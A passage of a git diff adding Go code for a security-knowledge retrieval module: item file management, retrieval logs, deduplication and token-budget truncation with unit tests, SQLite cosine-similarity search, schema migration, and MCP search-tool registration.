确保新目录存在 + if err := os.MkdirAll(filepath.Dir(newFilePath), 0755); err != nil { + return nil, fmt.Errorf("创建目录失败: %w", err) + } + + // 移动文件 + if err := os.Rename(item.FilePath, newFilePath); err != nil { + return nil, fmt.Errorf("移动文件失败: %w", err) + } + + // 删除旧目录(如果为空) + oldDir := filepath.Dir(item.FilePath) + if isEmpty, _ := isEmptyDir(oldDir); isEmpty { + // 只有当目录不是知识库根目录时才删除(避免删除根目录) + if oldDir != m.basePath { + if err := os.Remove(oldDir); err != nil { + m.logger.Warn("删除空目录失败", zap.String("dir", oldDir), zap.Error(err)) + } + } + } + } + + // 写入文件 + if err := os.WriteFile(newFilePath, []byte(content), 0644); err != nil { + return nil, fmt.Errorf("写入文件失败: %w", err) + } + + // 更新数据库 + _, err = m.db.Exec( + "UPDATE knowledge_base_items SET category = ?, title = ?, file_path = ?, content = ?, updated_at = ? WHERE id = ?", + category, title, newFilePath, content, time.Now(), id, + ) + if err != nil { + return nil, fmt.Errorf("更新知识项失败: %w", err) + } + + // 删除旧的向量嵌入(需要重新索引) + _, err = m.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", id) + if err != nil { + m.logger.Warn("删除旧向量嵌入失败", zap.Error(err)) + } + + return m.GetItem(id) +} + +// DeleteItem 删除知识项 +func (m *Manager) DeleteItem(id string) error { + // 获取文件路径 + var filePath string + err := m.db.QueryRow("SELECT file_path FROM knowledge_base_items WHERE id = ?", id).Scan(&filePath) + if err != nil { + return fmt.Errorf("查询知识项失败: %w", err) + } + + // 删除文件 + if err := os.Remove(filePath); err != nil && !os.IsNotExist(err) { + m.logger.Warn("删除文件失败", zap.String("path", filePath), zap.Error(err)) + } + + // 删除数据库记录(级联删除向量) + _, err = m.db.Exec("DELETE FROM knowledge_base_items WHERE id = ?", id) + if err != nil { + return fmt.Errorf("删除知识项失败: %w", err) + } + + // 删除空目录(如果为空) + dir := filepath.Dir(filePath) + if isEmpty, _ := isEmptyDir(dir); isEmpty { + // 只有当目录不是知识库根目录时才删除(避免删除根目录) + if dir != m.basePath { + if err := os.Remove(dir); err != nil { + m.logger.Warn("删除空目录失败", zap.String("dir", dir), zap.Error(err)) + } + } + } + + return nil +} + +// isEmptyDir 检查目录是否为空(忽略隐藏文件和 . 开头的文件) +func isEmptyDir(dir string) (bool, error) { + entries, err := os.ReadDir(dir) + if err != nil { + return false, err + } + for _, entry := range entries { + // 忽略隐藏文件(以 . 开头) + if !strings.HasPrefix(entry.Name(), ".") { + return false, nil + } + } + return true, nil +} + +// LogRetrieval 记录检索日志 +func (m *Manager) LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error { + id := uuid.New().String() + itemsJSON, _ := json.Marshal(retrievedItems) + + _, err := m.db.Exec( + "INSERT INTO knowledge_retrieval_logs (id, conversation_id, message_id, query, risk_type, retrieved_items, created_at) VALUES (?, ?, ?, ?, ?, ?, ?)", + id, conversationID, messageID, query, riskType, string(itemsJSON), time.Now(), + ) + return err +} + +// GetIndexStatus 获取索引状态 +func (m *Manager) GetIndexStatus() (map[string]interface{}, error) { + // 获取总知识项数 + var totalItems int + err := m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems) + if err != nil { + return nil, fmt.Errorf("查询总知识项数失败: %w", err) + } + + // 获取已索引的知识项数(有向量嵌入的) + var indexedItems int + err = m.db.QueryRow(` + SELECT COUNT(DISTINCT item_id) + FROM knowledge_embeddings + `).Scan(&indexedItems) + if err != nil { + return nil, fmt.Errorf("查询已索引项数失败: %w", err) + } + + // 计算进度百分比 + var progressPercent float64 + if totalItems > 0 { + progressPercent = float64(indexedItems) / float64(totalItems) * 100 + } else { + progressPercent = 100.0 + } + + // 判断是否完成 + isComplete := indexedItems >= totalItems && totalItems > 0 + + return map[string]interface{}{ + "total_items": totalItems, + "indexed_items": indexedItems, + "progress_percent": progressPercent, + "is_complete": isComplete, + }, nil +} + +// GetRetrievalLogs 获取检索日志 +func (m *Manager) GetRetrievalLogs(conversationID, messageID string, limit int) ([]*RetrievalLog, error) { + var rows *sql.Rows + var err error + + if messageID != "" { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE message_id = ? ORDER BY created_at DESC LIMIT ?", + messageID, limit, + ) + } else if conversationID != "" { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE conversation_id = ? ORDER BY created_at DESC LIMIT ?", + conversationID, limit, + ) + } else { + rows, err = m.db.Query( + "SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs ORDER BY created_at DESC LIMIT ?", + limit, + ) + } + + if err != nil { + return nil, fmt.Errorf("查询检索日志失败: %w", err) + } + defer rows.Close() + + var logs []*RetrievalLog + for rows.Next() { + log := &RetrievalLog{} + var createdAt string + var itemsJSON sql.NullString + if err := rows.Scan(&log.ID, &log.ConversationID, &log.MessageID, &log.Query, &log.RiskType, &itemsJSON, &createdAt); err != nil { + return nil, fmt.Errorf("扫描检索日志失败: %w", err) + } + + // 解析时间 - 支持多种格式 + var err error + timeFormats := []string{ + "2006-01-02 15:04:05.999999999-07:00", + "2006-01-02 15:04:05.999999999", + "2006-01-02T15:04:05.999999999Z07:00", + "2006-01-02T15:04:05Z", + "2006-01-02 15:04:05", + time.RFC3339, + time.RFC3339Nano, + } + + for _, format := range timeFormats { + log.CreatedAt, err = time.Parse(format, createdAt) + if err == nil && !log.CreatedAt.IsZero() { + break + } + } + + // 如果所有格式都失败,记录警告但继续处理 + if log.CreatedAt.IsZero() { + m.logger.Warn("解析检索日志时间失败", + zap.String("timeStr", createdAt), + zap.Error(err), + ) + // 使用当前时间作为fallback + log.CreatedAt = time.Now() + } + + // 解析检索项 + if itemsJSON.Valid { + json.Unmarshal([]byte(itemsJSON.String), &log.RetrievedItems) + } + + logs = append(logs, log) + } + + return logs, nil +} + +// DeleteRetrievalLog 删除检索日志 +func (m *Manager) DeleteRetrievalLog(id string) error { + result, err := m.db.Exec("DELETE FROM knowledge_retrieval_logs WHERE id = ?", id) + if err != nil { + return fmt.Errorf("删除检索日志失败: %w", err) + } + + rowsAffected, err := result.RowsAffected() + if err != nil { + return fmt.Errorf("获取删除行数失败: %w", err) + } + + if rowsAffected == 0 { + return fmt.Errorf("检索日志不存在") + } + + return nil +} diff --git a/internal/knowledge/retrieval_postprocess.go b/internal/knowledge/retrieval_postprocess.go new file mode 100644 index 00000000..eb69e4c3 --- /dev/null +++ b/internal/knowledge/retrieval_postprocess.go @@ -0,0 +1,213 @@ +package knowledge + +import ( + "context" + "crypto/sha256" + "encoding/hex" + "fmt" + "strings" + "sync" + "unicode" + "unicode/utf8" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/schema" + "github.com/pkoukk/tiktoken-go" +) + +// postRetrieveMaxPrefetchCap 限制单次向量候选上限,避免误配置导致全表扫压力过大。 +const postRetrieveMaxPrefetchCap = 200 + +// DocumentReranker 可选重排(如交叉编码器 / 第三方 Rerank API),由 [Retriever.SetDocumentReranker] 注入;失败时在适配层降级为向量序。 +type DocumentReranker interface { + Rerank(ctx context.Context, query string, docs []*schema.Document) ([]*schema.Document, error) +} + +// NopDocumentReranker 占位实现,便于测试或未启用重排时显式注入。 +type NopDocumentReranker struct{} + +// Rerank implements [DocumentReranker] as no-op. +func (NopDocumentReranker) Rerank(_ context.Context, _ string, docs []*schema.Document) ([]*schema.Document, error) { + return docs, nil +} + +var tiktokenEncMu sync.Mutex +var tiktokenEncCache = map[string]*tiktoken.Tiktoken{} + +func encodingForTokenizerModel(model string) (*tiktoken.Tiktoken, error) { + m := strings.TrimSpace(model) + if m == "" { + m = "gpt-4" + } + tiktokenEncMu.Lock() + defer tiktokenEncMu.Unlock() + if enc, ok := tiktokenEncCache[m]; ok { + return enc, nil + } + enc, err := tiktoken.EncodingForModel(m) + if err != nil { + enc, err = tiktoken.GetEncoding("cl100k_base") + if err != nil { + return nil, err + } + } + tiktokenEncCache[m] = enc + return enc, nil +} + +func countDocTokens(text, model string) (int, error) { + enc, err := encodingForTokenizerModel(model) + if err != nil { + return 0, err + } + toks := enc.Encode(text, nil, nil) + return len(toks), nil +} + +// normalizeContentFingerprintKey 去重键:trim + 空白折叠(不改动大小写,避免合并仅大小写不同的代码片段)。 +func normalizeContentFingerprintKey(s string) string { + s = strings.TrimSpace(s) + var b strings.Builder + b.Grow(len(s)) + prevSpace := false + for _, r := range s { + if unicode.IsSpace(r) { + if !prevSpace { + b.WriteByte(' ') + prevSpace = true + } + continue + } + prevSpace = false + b.WriteRune(r) + } + return b.String() +} + +func contentNormKey(d *schema.Document) string { + if d == nil { + return "" + } + n := normalizeContentFingerprintKey(d.Content) + if n == "" { + return "" + } + sum := sha256.Sum256([]byte(n)) + return hex.EncodeToString(sum[:]) +} + +// dedupeByNormalizedContent 按规范化正文去重,保留向量检索顺序中首次出现的文档(同正文仅保留一条)。 +func dedupeByNormalizedContent(docs []*schema.Document) []*schema.Document { + if len(docs) < 2 { + return docs + } + seen := make(map[string]struct{}, len(docs)) + out := make([]*schema.Document, 0, len(docs)) + for _, d := range docs { + if d == nil { + continue + } + k := contentNormKey(d) + if k == "" { + out = append(out, d) + continue + } + if _, ok := seen[k]; ok { + continue + } + seen[k] = struct{}{} + out = append(out, d) + } + return out +} + +// truncateDocumentsByBudget 按检索顺序整段保留文档,直至字符数或 token 数(任一启用)超限则停止。 +func truncateDocumentsByBudget(docs []*schema.Document, maxRunes, maxTokens int, tokenModel string) ([]*schema.Document, error) { + if len(docs) == 0 { + return docs, nil + } + unlimitedChars := maxRunes <= 0 + unlimitedTok := maxTokens <= 0 + if unlimitedChars && unlimitedTok { + return docs, nil + } + + remRunes := maxRunes + remTok := maxTokens + out := make([]*schema.Document, 0, len(docs)) + + for _, d := range docs { + if d == nil || strings.TrimSpace(d.Content) == "" { + continue + } + runes := utf8.RuneCountInString(d.Content) + if !unlimitedChars && runes > remRunes { + break + } + var tok int + var err error + if !unlimitedTok { + tok, err = countDocTokens(d.Content, tokenModel) + if err != nil { + return nil, fmt.Errorf("token count: %w", err) + } + if tok > remTok { + break + } + } + out = append(out, d) + if !unlimitedChars { + remRunes -= runes + } + if !unlimitedTok { + remTok -= tok + } + } + return out, nil +} + +// EffectivePrefetchTopK 计算向量检索应拉取的候选条数(供粗排 / 去重 / 重排)。 +func EffectivePrefetchTopK(topK int, po *config.PostRetrieveConfig) int { + if topK < 1 { + topK = 5 + } + fetch := topK + if po != nil && po.PrefetchTopK > fetch { + fetch = po.PrefetchTopK + } + if fetch > postRetrieveMaxPrefetchCap { + fetch = postRetrieveMaxPrefetchCap + } + return fetch +} + +// ApplyPostRetrieve 检索后处理:规范化正文去重 → 预算截断 → 最终 TopK。重排在 [VectorEinoRetriever] 中单独调用以便失败时降级。 +func ApplyPostRetrieve(docs []*schema.Document, po *config.PostRetrieveConfig, tokenModel string, finalTopK int) ([]*schema.Document, error) { + if finalTopK < 1 { + finalTopK = 5 + } + if len(docs) == 0 { + return docs, nil + } + + maxChars := 0 + maxTok := 0 + if po != nil { + maxChars = po.MaxContextChars + maxTok = po.MaxContextTokens + } + + out := dedupeByNormalizedContent(docs) + + var err error + out, err = truncateDocumentsByBudget(out, maxChars, maxTok, tokenModel) + if err != nil { + return nil, err + } + + if len(out) > finalTopK { + out = out[:finalTopK] + } + return out, nil +} diff --git a/internal/knowledge/retrieval_postprocess_test.go b/internal/knowledge/retrieval_postprocess_test.go new file mode 100644 index 00000000..10c661a8 --- /dev/null +++ b/internal/knowledge/retrieval_postprocess_test.go @@ -0,0 +1,62 @@ +package knowledge + +import ( + "testing" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/schema" +) + +func doc(id, content string, score float64) *schema.Document { + d := &schema.Document{ID: id, Content: content, MetaData: map[string]any{metaKBItemID: "it1"}} + d.WithScore(score) + return d +} + +func TestDedupeByNormalizedContent(t *testing.T) { + a := doc("1", "hello world", 0.9) + b := doc("2", "hello world", 0.8) + c := doc("3", "other", 0.7) + out := dedupeByNormalizedContent([]*schema.Document{a, b, c}) + if len(out) != 2 { + t.Fatalf("len=%d want 2", len(out)) + } + if out[0].ID != "1" || out[1].ID != "3" { + t.Fatalf("order/ids wrong: %#v", out) + } +} + +func TestEffectivePrefetchTopK(t *testing.T) { + if g := EffectivePrefetchTopK(5, nil); g != 5 { + t.Fatalf("got %d", g) + } + if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 50}); g != 50 { + t.Fatalf("got %d", g) + } + if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 9999}); g != postRetrieveMaxPrefetchCap { + t.Fatalf("cap: got %d", g) + } +} + +func TestApplyPostRetrieveTruncateAndTopK(t *testing.T) { + d1 := doc("1", "ab", 0.9) + d2 := doc("2", "cd", 0.8) + d3 := doc("3", "ef", 0.7) + po := &config.PostRetrieveConfig{MaxContextChars: 3} + out, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, po, "gpt-4", 5) + if err != nil { + t.Fatal(err) + } + if len(out) != 1 || out[0].ID != "1" { + t.Fatalf("got %#v", out) + } + + out2, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, nil, "gpt-4", 2) + if err != nil { + t.Fatal(err) + } + if len(out2) != 2 { + t.Fatalf("topk: len=%d", len(out2)) + } +} diff --git a/internal/knowledge/retriever.go b/internal/knowledge/retriever.go new file mode 100644 index 00000000..9145b2c6 --- /dev/null +++ b/internal/knowledge/retriever.go @@ -0,0 +1,305 @@ +package knowledge + +import ( + "context" + "database/sql" + "encoding/json" + "fmt" + "math" + "sort" + "strings" + "sync" + + "cyberstrike-ai/internal/config" + + "github.com/cloudwego/eino/components/retriever" + "github.com/cloudwego/eino/schema" + "go.uber.org/zap" +) + +// Retriever 检索器:SQLite 存向量 + Eino 嵌入,**纯向量检索**(余弦相似度、TopK、阈值), +// 实现语义与 [retriever.Retriever] 适配层 [VectorEinoRetriever] 一致。 +type Retriever struct { + db *sql.DB + embedder *Embedder + config *RetrievalConfig + logger *zap.Logger + + rerankMu sync.RWMutex + reranker DocumentReranker +} + +// RetrievalConfig 检索配置 +type RetrievalConfig struct { + TopK int + SimilarityThreshold float64 + // SubIndexFilter 非空时仅检索 sub_indexes 包含该标签(逗号分隔之一)的行;空 sub_indexes 的旧行仍保留以兼容。 + SubIndexFilter string + PostRetrieve config.PostRetrieveConfig +} + +// NewRetriever 创建新的检索器 +func NewRetriever(db *sql.DB, embedder *Embedder, config *RetrievalConfig, logger *zap.Logger) *Retriever { + return &Retriever{ + db: db, + embedder: embedder, + config: config, + logger: logger, + } +} + +// UpdateConfig 更新检索配置 +func (r *Retriever) UpdateConfig(cfg *RetrievalConfig) { + if cfg != nil { + r.config = cfg + if r.logger != nil { + r.logger.Info("检索器配置已更新", + zap.Int("top_k", cfg.TopK), + zap.Float64("similarity_threshold", cfg.SimilarityThreshold), + zap.String("sub_index_filter", cfg.SubIndexFilter), + zap.Int("post_retrieve_prefetch_top_k", cfg.PostRetrieve.PrefetchTopK), + zap.Int("post_retrieve_max_context_chars", cfg.PostRetrieve.MaxContextChars), + zap.Int("post_retrieve_max_context_tokens", cfg.PostRetrieve.MaxContextTokens), + ) + } + } +} + +// SetDocumentReranker 注入可选重排器(并发安全);nil 表示禁用。 +func (r *Retriever) SetDocumentReranker(rr DocumentReranker) { + if r == nil { + return + } + r.rerankMu.Lock() + defer r.rerankMu.Unlock() + r.reranker = rr +} + +func (r *Retriever) documentReranker() DocumentReranker { + if r == nil { + return nil + } + r.rerankMu.RLock() + defer r.rerankMu.RUnlock() + return r.reranker +} + +func cosineSimilarity(a, b []float32) float64 { + if len(a) != len(b) { + return 0.0 + } + + var dotProduct, normA, normB float64 + for i := range a { + dotProduct += float64(a[i] * b[i]) + normA += float64(a[i] * a[i]) + normB += float64(b[i] * b[i]) + } + + if normA == 0 || normB == 0 { + return 0.0 + } + + return dotProduct / (math.Sqrt(normA) * math.Sqrt(normB)) +} + +// Search 搜索知识库。统一经 [VectorEinoRetriever](Eino retriever.Retriever 边界)。 +func (r *Retriever) Search(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) { + if req == nil { + return nil, fmt.Errorf("请求不能为空") + } + q := strings.TrimSpace(req.Query) + if q == "" { + return nil, fmt.Errorf("查询不能为空") + } + opts := r.einoRetrieverOptions(req) + docs, err := NewVectorEinoRetriever(r).Retrieve(ctx, q, opts...) + if err != nil { + return nil, err + } + return documentsToRetrievalResults(docs) +} + +func (r *Retriever) einoRetrieverOptions(req *SearchRequest) []retriever.Option { + var opts []retriever.Option + if req.TopK > 0 { + opts = append(opts, retriever.WithTopK(req.TopK)) + } + dsl := map[string]any{} + if strings.TrimSpace(req.RiskType) != "" { + dsl[DSLRiskType] = strings.TrimSpace(req.RiskType) + } + if req.Threshold > 0 { + dsl[DSLSimilarityThreshold] = req.Threshold + } + if strings.TrimSpace(req.SubIndexFilter) != "" { + dsl[DSLSubIndexFilter] = strings.TrimSpace(req.SubIndexFilter) + } + if len(dsl) > 0 { + opts = append(opts, retriever.WithDSLInfo(dsl)) + } + return opts +} + +// EinoRetrieve 直接返回 [schema.Document],供 Eino Graph / Chain 使用。 +func (r *Retriever) EinoRetrieve(ctx context.Context, query string, opts ...retriever.Option) ([]*schema.Document, error) { + return NewVectorEinoRetriever(r).Retrieve(ctx, query, opts...) +} + +func (r *Retriever) knowledgeEmbeddingSelectSQL(riskType, subIndexFilter string) (string, []interface{}) { + q := `SELECT e.id, e.item_id, e.chunk_index, e.chunk_text, e.embedding, e.embedding_model, e.embedding_dim, i.category, i.title +FROM knowledge_embeddings e +JOIN knowledge_base_items i ON e.item_id = i.id +WHERE 1=1` + var args []interface{} + if strings.TrimSpace(riskType) != "" { + q += ` AND TRIM(i.category) = TRIM(?) COLLATE NOCASE` + args = append(args, riskType) + } + if tag := strings.TrimSpace(subIndexFilter); tag != "" { + tag = strings.ToLower(strings.ReplaceAll(tag, " ", "")) + q += ` AND (TRIM(COALESCE(e.sub_indexes,'')) = '' OR INSTR(',' || LOWER(REPLACE(e.sub_indexes,' ','')) || ',', ',' || ? || ',') > 0)` + args = append(args, tag) + } + return q, args +} + +// vectorSearch 纯向量检索:余弦相似度排序,按相似度阈值与 TopK 截断(无 BM25、无混合分、无邻块扩展)。 +func (r *Retriever) vectorSearch(ctx context.Context, req *SearchRequest) ([]*RetrievalResult, error) { + if req.Query == "" { + return nil, fmt.Errorf("查询不能为空") + } + + topK := req.TopK + if topK <= 0 && r.config != nil { + topK = r.config.TopK + } + if topK <= 0 { + topK = 5 + } + + threshold := req.Threshold + if threshold <= 0 && r.config != nil { + threshold = r.config.SimilarityThreshold + } + if threshold <= 0 { + threshold = 0.7 + } + + subIdxFilter := strings.TrimSpace(req.SubIndexFilter) + if subIdxFilter == "" && r.config != nil { + subIdxFilter = strings.TrimSpace(r.config.SubIndexFilter) + } + + queryText := FormatQueryEmbeddingText(req.RiskType, req.Query) + queryEmbedding, err := r.embedder.EmbedText(ctx, queryText) + if err != nil { + return nil, fmt.Errorf("向量化查询失败: %w", err) + } + queryDim := len(queryEmbedding) + expectedModel := "" + if r.embedder != nil { + expectedModel = r.embedder.EmbeddingModelName() + } + + sqlStr, sqlArgs := r.knowledgeEmbeddingSelectSQL(strings.TrimSpace(req.RiskType), subIdxFilter) + rows, err := r.db.QueryContext(ctx, sqlStr, sqlArgs...) + if err != nil { + return nil, fmt.Errorf("查询向量失败: %w", err) + } + defer rows.Close() + + type candidate struct { + chunk *KnowledgeChunk + item *KnowledgeItem + similarity float64 + } + + candidates := make([]candidate, 0) + rowNum := 0 + for rows.Next() { + rowNum++ + if rowNum%48 == 0 { + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + } + } + + var chunkID, itemID, chunkText, embeddingJSON, category, title, rowModel string + var chunkIndex, rowDim int + + if err := rows.Scan(&chunkID, &itemID, &chunkIndex, &chunkText, &embeddingJSON, &rowModel, &rowDim, &category, &title); err != nil { + r.logger.Warn("扫描向量失败", zap.Error(err)) + continue + } + + var embedding []float32 + if err := json.Unmarshal([]byte(embeddingJSON), &embedding); err != nil { + r.logger.Warn("解析向量失败", zap.Error(err)) + continue + } + + if rowDim > 0 && len(embedding) != rowDim { + r.logger.Debug("跳过维度不一致的向量行", zap.String("chunkId", chunkID), zap.Int("rowDim", rowDim), zap.Int("got", len(embedding))) + continue + } + if queryDim > 0 && len(embedding) != queryDim { + r.logger.Debug("跳过与查询维度不一致的向量", zap.String("chunkId", chunkID), zap.Int("queryDim", queryDim), zap.Int("got", len(embedding))) + continue + } + if expectedModel != "" && strings.TrimSpace(rowModel) != "" && strings.TrimSpace(rowModel) != expectedModel { + r.logger.Debug("跳过嵌入模型不一致的行", zap.String("chunkId", chunkID), zap.String("rowModel", rowModel), zap.String("expected", expectedModel)) + continue + } + + similarity := cosineSimilarity(queryEmbedding, embedding) + candidates = append(candidates, candidate{ + chunk: &KnowledgeChunk{ + ID: chunkID, + ItemID: itemID, + ChunkIndex: chunkIndex, + ChunkText: chunkText, + Embedding: embedding, + }, + item: &KnowledgeItem{ + ID: itemID, + Category: category, + Title: title, + }, + similarity: similarity, + }) + } + + sort.Slice(candidates, func(i, j int) bool { + return candidates[i].similarity > candidates[j].similarity + }) + + filtered := make([]candidate, 0, len(candidates)) + for _, c := range candidates { + if c.similarity >= threshold { + filtered = append(filtered, c) + } + } + + if len(filtered) > topK { + filtered = filtered[:topK] + } + + results := make([]*RetrievalResult, len(filtered)) + for i, c := range filtered { + results[i] = &RetrievalResult{ + Chunk: c.chunk, + Item: c.item, + Similarity: c.similarity, + Score: c.similarity, + } + } + return results, nil +} + +// AsEinoRetriever 将纯向量检索暴露为 Eino [retriever.Retriever]。 +func (r *Retriever) AsEinoRetriever() retriever.Retriever { + return NewVectorEinoRetriever(r) +} diff --git a/internal/knowledge/schema_migrate.go b/internal/knowledge/schema_migrate.go new file mode 100644 index 00000000..85fd26e2 --- /dev/null +++ b/internal/knowledge/schema_migrate.go @@ -0,0 +1,51 @@ +package knowledge + +import ( + "database/sql" + "fmt" +) + +// EnsureKnowledgeEmbeddingsSchema migrates knowledge_embeddings for sub_indexes + embedding metadata. +func EnsureKnowledgeEmbeddingsSchema(db *sql.DB) error { + if db == nil { + return fmt.Errorf("db is nil") + } + var n int + if err := db.QueryRow(`SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='knowledge_embeddings'`).Scan(&n); err != nil { + return err + } + if n == 0 { + return nil + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "sub_indexes", + `ALTER TABLE knowledge_embeddings ADD COLUMN sub_indexes TEXT NOT NULL DEFAULT ''`); err != nil { + return err + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_model", + `ALTER TABLE knowledge_embeddings ADD COLUMN embedding_model TEXT NOT NULL DEFAULT ''`); err != nil { + return err + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_dim", + `ALTER TABLE knowledge_embeddings ADD COLUMN embedding_dim INTEGER NOT NULL DEFAULT 0`); err != nil { + return err + } + return nil +} + +func addKnowledgeEmbeddingsColumnIfMissing(db *sql.DB, column, alterSQL string) error { + var colCount int + q := `SELECT COUNT(*) FROM pragma_table_info('knowledge_embeddings') WHERE name = ?` + if err := db.QueryRow(q, column).Scan(&colCount); err != nil { + return err + } + if colCount > 0 { + return nil + } + _, err := db.Exec(alterSQL) + return err +} + +// ensureKnowledgeEmbeddingsSubIndexesColumn 向后兼容;请使用 [EnsureKnowledgeEmbeddingsSchema]。 +func ensureKnowledgeEmbeddingsSubIndexesColumn(db *sql.DB) error { + return EnsureKnowledgeEmbeddingsSchema(db) +} diff --git a/internal/knowledge/tool.go b/internal/knowledge/tool.go new file mode 100644 index 00000000..c7aa3f68 --- /dev/null +++ b/internal/knowledge/tool.go @@ -0,0 +1,323 @@ +package knowledge + +import ( + "context" + "encoding/json" + "fmt" + "sort" + "strings" + + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + + "go.uber.org/zap" +) + +// RegisterKnowledgeTool 注册知识检索工具到MCP服务器 +func RegisterKnowledgeTool( + mcpServer *mcp.Server, + retriever *Retriever, + manager *Manager, + logger *zap.Logger, +) { + // 注册第一个工具:获取所有可用的风险类型列表 + listRiskTypesTool := mcp.Tool{ + Name: builtin.ToolListKnowledgeRiskTypes, + Description: "获取知识库中所有可用的风险类型(risk_type)列表。在搜索知识库之前,可以先调用此工具获取可用的风险类型,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间并提高检索准确性。", + ShortDescription: "获取知识库中所有可用的风险类型列表", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{}, + "required": []string{}, + }, + } + + listRiskTypesHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + categories, err := manager.GetCategories() + if err != nil { + logger.Error("获取风险类型列表失败", zap.Error(err)) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("获取风险类型列表失败: %v", err), + }, + }, + IsError: true, + }, nil + } + + if len(categories) == 0 { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "知识库中暂无风险类型。", + }, + }, + }, nil + } + + var resultText strings.Builder + resultText.WriteString(fmt.Sprintf("知识库中共有 %d 个风险类型:\n\n", len(categories))) + for i, category := range categories { + resultText.WriteString(fmt.Sprintf("%d. %s\n", i+1, category)) + } + resultText.WriteString("\n提示:在调用 " + builtin.ToolSearchKnowledgeBase + " 工具时,可以使用上述风险类型之一作为 risk_type 参数,以缩小搜索范围并提高检索效率。") + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: resultText.String(), + }, + }, + }, nil + } + + mcpServer.RegisterTool(listRiskTypesTool, listRiskTypesHandler) + logger.Info("风险类型列表工具已注册", zap.String("toolName", listRiskTypesTool.Name)) + + // 注册第二个工具:搜索知识库(保持原有功能) + searchTool := mcp.Tool{ + Name: builtin.ToolSearchKnowledgeBase, + Description: "在知识库中搜索相关的安全知识。当你需要了解特定漏洞类型、攻击技术、检测方法等安全知识时,可以使用此工具进行检索。工具基于向量嵌入与余弦相似度检索(与 Eino retriever 语义一致)。建议:在搜索前可以先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型,然后使用正确的 risk_type 参数进行精确搜索,这样可以大幅减少检索时间。", + ShortDescription: "搜索知识库中的安全知识(向量语义检索)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "query": map[string]interface{}{ + "type": "string", + "description": "搜索查询内容,描述你想要了解的安全知识主题", + }, + "risk_type": map[string]interface{}{ + "type": "string", + "description": "可选:指定风险类型(如:SQL注入、XSS、文件上传等)。建议先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型列表,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间。如果不指定则搜索所有类型。", + }, + }, + "required": []string{"query"}, + }, + } + + searchHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + query, ok := args["query"].(string) + if !ok || query == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: 查询参数不能为空", + }, + }, + IsError: true, + }, nil + } + + riskType := "" + if rt, ok := args["risk_type"].(string); ok && rt != "" { + riskType = rt + } + + logger.Info("执行知识库检索", + zap.String("query", query), + zap.String("riskType", riskType), + ) + + // 检索统一走 Retriever.Search → VectorEinoRetriever(Eino retriever 语义)。 + searchReq := &SearchRequest{ + Query: query, + RiskType: riskType, + TopK: 5, + } + + results, err := retriever.Search(ctx, searchReq) + if err != nil { + logger.Error("知识库检索失败", zap.Error(err)) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("检索失败: %v", err), + }, + }, + IsError: true, + }, nil + } + + if len(results) == 0 { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("未找到与查询 '%s' 相关的知识。建议:\n1. 尝试使用不同的关键词\n2. 检查风险类型是否正确\n3. 确认知识库中是否包含相关内容", query), + }, + }, + }, nil + } + + // 格式化结果 + var resultText strings.Builder + + // 按余弦相似度(Score)降序 + sort.Slice(results, func(i, j int) bool { + return results[i].Score > results[j].Score + }) + + // 按文档分组结果,以便更好地展示上下文 + type itemGroup struct { + itemID string + results []*RetrievalResult + maxScore float64 // 该文档块的最高相似度 + } + itemGroups := make([]*itemGroup, 0) + itemMap := make(map[string]*itemGroup) + + for _, result := range results { + itemID := result.Item.ID + group, exists := itemMap[itemID] + if !exists { + group = &itemGroup{ + itemID: itemID, + results: make([]*RetrievalResult, 0), + maxScore: result.Score, + } + itemMap[itemID] = group + itemGroups = append(itemGroups, group) + } + group.results = append(group.results, result) + if result.Score > group.maxScore { + group.maxScore = result.Score + } + } + + // 按文档内最高相似度排序 + sort.Slice(itemGroups, func(i, j int) bool { + return itemGroups[i].maxScore > itemGroups[j].maxScore + }) + + // 收集检索到的知识项ID(用于日志) + retrievedItemIDs := make([]string, 0, len(itemGroups)) + + resultText.WriteString(fmt.Sprintf("找到 %d 条相关知识片段:\n\n", len(results))) + + resultIndex := 1 + for _, group := range itemGroups { + itemResults := group.results + mainResult := itemResults[0] + maxScore := mainResult.Score + for _, result := range itemResults { + if result.Score > maxScore { + maxScore = result.Score + mainResult = result + } + } + + // 按chunk_index排序,保证阅读的逻辑顺序(文档的原始顺序) + sort.Slice(itemResults, func(i, j int) bool { + return 